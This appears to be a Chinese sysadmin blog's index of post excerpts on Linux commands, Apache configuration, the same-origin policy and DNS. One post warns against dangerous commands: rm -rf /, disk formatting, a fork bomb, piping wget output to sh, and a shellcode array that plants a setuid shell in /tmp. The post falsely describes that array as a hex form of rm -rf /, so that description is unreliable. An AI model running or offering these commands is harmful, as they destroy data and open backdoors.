我想网

最近，Dragon Research Group 发布了一个 Linux/SSH 密码认证的报告， 统计了一些最常用的 Linux/SSH 用户名和密码，下图截取自 DRG SSH Username and Password Authentication Tag Clouds，看看有没有自己常用的密码，有的话赶快换吧。

(全文 …)

Tags: Linux
Posted in Server, 站长工具 评论关闭

Linux发行版本之间的差别其实很少，差别主要表现在系统管理的特色工具以及软件包管理方式的不同，除此之外，没有什么大的差别； 比如Fedora软件包管理工具是rpm，而Slackware是pkgtool 或installpkg等；

言归正传，我们接着说文件系统组织结构。

/ Linux文件系统的入口，也是处于最高一级的目录；

/bin 基础系统所需要的那些命令位于此目录，也是最小系统所需要的命令；比如 ls、cp、mkdir等命令；功能和/usr/bin类似，这个目录中的文件都是可执行的，普通用户都可以使用的命令。做为基础系统所需要的最基础的命 令就是放在这里。

/boot Linux的内核及引导系统程序所需要的文件，比如 vmlinuz initrd.img 文件都位于这个目录中。在一般情况下，GRUB或LILO系统引导管理器也位于这个目录；
(全文 …)

Tags: Linux
Posted in Server, 站长工具 评论关闭

系统

# uname -a               # 查看内核/操作系统/CPU信息
# head -n 1 /etc/issue   # 查看操作系统版本
# cat /proc/cpuinfo      # 查看CPU信息
# hostname               # 查看计算机名
# lspci -tv              # 列出所有PCI设备
# lsusb -tv              # 列出所有USB设备
# lsmod                  # 列出加载的内核模块
# env                    # 查看环境变量

资源

# free -m                # 查看内存使用量和交换区使用量
# df -h                  # 查看各分区使用情况
# du -sh <目录名>        # 查看指定目录的大小
# grep MemTotal /proc/meminfo   # 查看内存总量
# grep MemFree /proc/meminfo    # 查看空闲内存量
# uptime                 # 查看系统运行时间、用户数、负载
# cat /proc/loadavg      # 查看系统负载
(全文 …)

Tags: command, Linux
Posted in Server, 站长工具 评论关闭

网站的访问速度对于一个网站非常重要，没有一个人会喜欢速度慢的网站。下面是12款在线测试网站的访问速度和性能的工具， 在优化网站的时候很有用。

Pingdom

测试网站每个元素的加载速度，比如html、图片、JS文件等等。

(全文 …)

Tags: Server, Tool, Website
Posted in Server, Tool, Website, 站长工具 评论关闭

同源策略

在客户端编程语言中，如JavaScript和ActionScript，同源策略是一个很重要的安全理念，它在保证数据的安全性方面有着重要的意 义。同源策略规定跨域之间的脚本是隔离的，一个域的脚本不能访问和操作另外一个域的绝大部分属性和方法。那么什么叫相同域，什么叫不同的域呢？当两个域具 有相同的协议(如http), 相同的端口(如80)，相同的host（如www.example.org)，那么我们就可以认为它们是相同的域。比如 http://www.example.org/index.html和http://www.example.org/sub/index.html是 同域，而http://www.example.org, https://www.example.org, http://www.example.org:8080, http://sub.example.org中的任何两个都将构成跨域。同源策略还应该对一些特殊情况做处理，比如限制file协议下脚本的访问权限。 本地的HTML文件在浏览器中是通过file协议打开的，如果脚本能通过file协议访问到硬盘上其它任意文件，就会出现安全隐患，目前IE8还有这样的 隐患。

受到同源策略的影响，跨域资源共享就会受到制约。但是随着人们的实践和浏览器的进步，目前在跨域请求的技巧上，有很多宝贵经验的沉淀和积累。这里我 把跨域资源共享分成两种，一种是单向的数据请求，还有一种是双向的消息通信。接下来我将罗列出常见的一些跨域方式，以下跨域实例的源代码可以从这里获得。
(全文 …)

Tags: Domain, Server
Posted in Server 评论关闭

如果你是一个 Linux 新手，在好奇心的驱使下，可能会去尝试从各个渠道获得的命令。以下是 7 个致命的 Linux 命令，轻则使你的数据造成丢失，重则使你的系统造成瘫痪，所以，你应当竭力避免在系统中运行它们。

1. rm -rf / 此命令将递归并强制删除 / 目录下的所有文件。

2. char esp[] __attribute__ ((section(".text"))) /* e.s.p
   release */
   = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
   "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
   "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
   "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
   "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
   "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
   "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
   "cp -p /bin/sh /tmp/.beyond; chmod 4755
   /tmp/.beyond;";
   

   这是 rm -rf / 的 hex（十六进制）版本，很能迷惑 Linux 用户。

3. mkfs.ext3 /dev/sda 这将对硬盘进行重新格式化，自然，硬盘上的所有数据将灰飞烟灭。
4. ){ :& };: 著名的 fork bomp，此命令将告诉你的系统执行海量的进程，直到你的系统僵死。
5. any_command > /dev/sda 使用该命令，原始数据将被写到块设备，其结果是造成数据丢失。
6. wget http://some_untrusted_source -O- | sh 不要从不信任的地方下载东西，这可能会获取恶意代码。
7. mv /home/yourhomedirectory/* /dev/null 此命令将移动主目录中的所有文件到一个不存在的地方，你将再也看不到那些文件。

Tags: command, Linux
Posted in Server, 程序开发 评论关闭

介绍和配置：

以数据库后台驱动的动态内容的网站，经常会遇到这些的问题：

• 当在浏览器的地址栏输入一个无效的参数时，会出现数据库的错误提示，这是一个安全的隐患
• 搜索引擎无法收录你的所有网页
• 网页的链接地址是一系列的参数，对浏览用户和搜索引擎都不易理解

这 些问题都可以通过Apache服务器的一个基本的模块mod_rewrite来解决，默认的安装的Apache就会装有这个模块。要启用这个模块，打开 httpd.conf文件，察看下面的两行是否被屏蔽，第一行是载入mod_rewrite模块，第二行是启用这个模块。

LoadModule rewrite_module modules/mod_rewrite.so
AddModule mod_rewrite.c

mod_rewrite这个模块是如何工作的呢？

mod_rewrite截获符合特定条件的URL，并按照设定的规则将它们改写成需要的URL。

比如，可以将 http://www.mysite.com/product.php?pid=123312 这样的URL改写成
http://www.mysite.com/product-123312.html 这样的静态URL，或者是更具体的 http://www.mysite.com/product/thinkpad-t42.html
(全文 …)

Tags: Apache
Posted in Apache 评论关闭

APACHE的SSL配置实例

<IfModule mod_ssl.c>
<VirtualHost 85.85.171.15:443>
SSLEngine on
SSLOptions +StrictRequire

SSLCertificateKeyFile /etc/apache2/ssl/server.key
SSLCertificateFile /etc/apache2/ssl/80yun.com.crt
#SSLCACertificateFile /etc/apache2/ssl/sf_bundle.crt

#SSLCertificateFile /etc/apache2/ssl/server.crt
#SSLCertificateKeyFile /etc/apache2/ssl/server.key
ServerName www.80yun.com
#ServerName www.80yun.co.uk
DocumentRoot /home/www/80yun/
</VirtualHost>
</IfModule>
<VirtualHost 85.35.73.151:443>
#        ServerName 80yun.co.uk
ServerName 80yun.com
redirectmatch 301 ^(.*) https://www.80yun.com$1
DocumentRoot /home/www/80yun/
</VirtualHost>
(全文 …)

Tags: Apache
Posted in Apache 评论关闭

首先介绍下DNSPod。DNSPod 是一款免费智能DNS产品。DNSPod 可以为同时有电信、网通、教育网服务器的网站提供智能的解析，让电信用户访问电信的服务器，网通的用户访问网通的服务器，达到互联互通的效果。能够让使用 双线路或拥有多镜像的网站站长轻松实现智能DNS解析，让用户仅用单域名即可访问到最快速的镜像。

(全文 …)

Tags: dns
Posted in Server, 站长工具 评论关闭

常用的公共 DNS 服务器包括：

Google Public DNS (8.8.8.8, 8.8.4.4)、

Norton DNS (198.153.192.1, 198.153.194.1)、

OpenDNS (208.67.222.222, 208.67.220.220)、

OpenDNS Family (208.67.222.123, 208.67.220.123)、

Comodo Secure DNS (156.154.70.22, 156.156.71.22)、

ScrubIt DNS (67.138.54.100, 207.225.209.66)、

DNS Advantage (156.154.70.1, 156.154.71.1)。

更换了DNS后, 记得在DOS下执行 ipconfig /flushdns 以清除DNS缓存.

Tags: dns, Server
Posted in Server 评论关闭